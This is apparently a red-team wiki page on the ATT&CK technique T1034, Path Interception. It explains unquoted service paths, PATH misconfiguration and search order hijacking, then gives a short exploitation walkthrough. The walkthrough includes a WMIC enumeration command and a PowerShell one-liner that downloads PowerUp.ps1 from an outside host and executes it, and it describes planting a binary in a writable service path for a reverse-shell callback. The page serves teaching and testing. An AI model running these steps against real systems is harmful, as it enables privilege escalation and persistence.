Path Interception

ID: T1034 Tactic: Persistence, Privilege Escalation

Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target.One example of this was the use of a copy of cmd in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function.

There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.

Unquoted Paths

Service paths (stored in Windows Registry Keys) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g, C:\unsafe path with space\program.exe VS "C:\safe path with space\program.exe" ). An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe , an adversary may create a program at C:\program.exe that will be run instead of the intended program.

PATH Environment Variable Misconfiguration

The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g. C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program ( such as cmd. PowerShell, or Python), which will be executed when that command is executed from a script or command-line.

For example, if C:\example path precedes C:\Windows\System32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead if the Windows system "net" when "net" is executed from the command-line.

Search Order Hijacking

Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. However, it is common for Windows to search in the directory if the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking( i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.

For example, "example.exe" runs "cmd.exe" with the command-line argument net user . An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" instead of "net.exe", then cm.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT.

Search order hijacking is also a common practice for hijacking DLL loads and is covered in DLL Search Order Hijacking.

How do we search for this vulnerability, well there are plenty of options that can help here so we can exploit. I will focus on Unquoted Paths in these examples. I will first find an Unquoted Path then I will verify if I have permissions to write a file into that path. We can use icacls.

For the sake of this demonstration this is all done with Administrator Privileges

This attack will focus on Unquoted Service Path

We can use WMIC:

wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "c:windows\" |findstr /i /v """

Also Powershell:

cmd /c 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows\" |findstr /i /v """'

Powersploit as well:

powershell.exe "IEX (New-Object Net.WebCLient).DownloadString('
http://192.168.56.101/PowerUp.ps1');Get-ServiceUnquoted"

We can use many other tool's and C2 Framework such as Covenant or Empire that will automate these tasks for us

Here powersploit already gives us en example on how to abuse the Function in the "Abuse Function" Column this will create a binary that adds a user "john" with the password "Password123!"

Now we want to verify if we have permissions to write onto one of the directories to use in the Hijack.

As we can see the Binary is being replaced, this post will be updated where I can manipulate another PATH some references down below for more details (As long as we get the idea :P)

I saved it to the PATH we are Hijacking

A we can see the "C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe" PATH is the only area where we have Full Control to Read and Write an Executable or any type of files we will use this PATH to add a binary and get a call back onto our reverse shell once it closes. We will need to name the File appropriate to the Service we are hijacking.

References

Windows Privilege Escalation — Part 1 (Unquoted Service Path)Medium

Windows Unquoted Service Path Enumeration VulnerabilityHEXpert

PreviousNew Service NextRegistry Keys / StartUp Folder

Last updated 4 years ago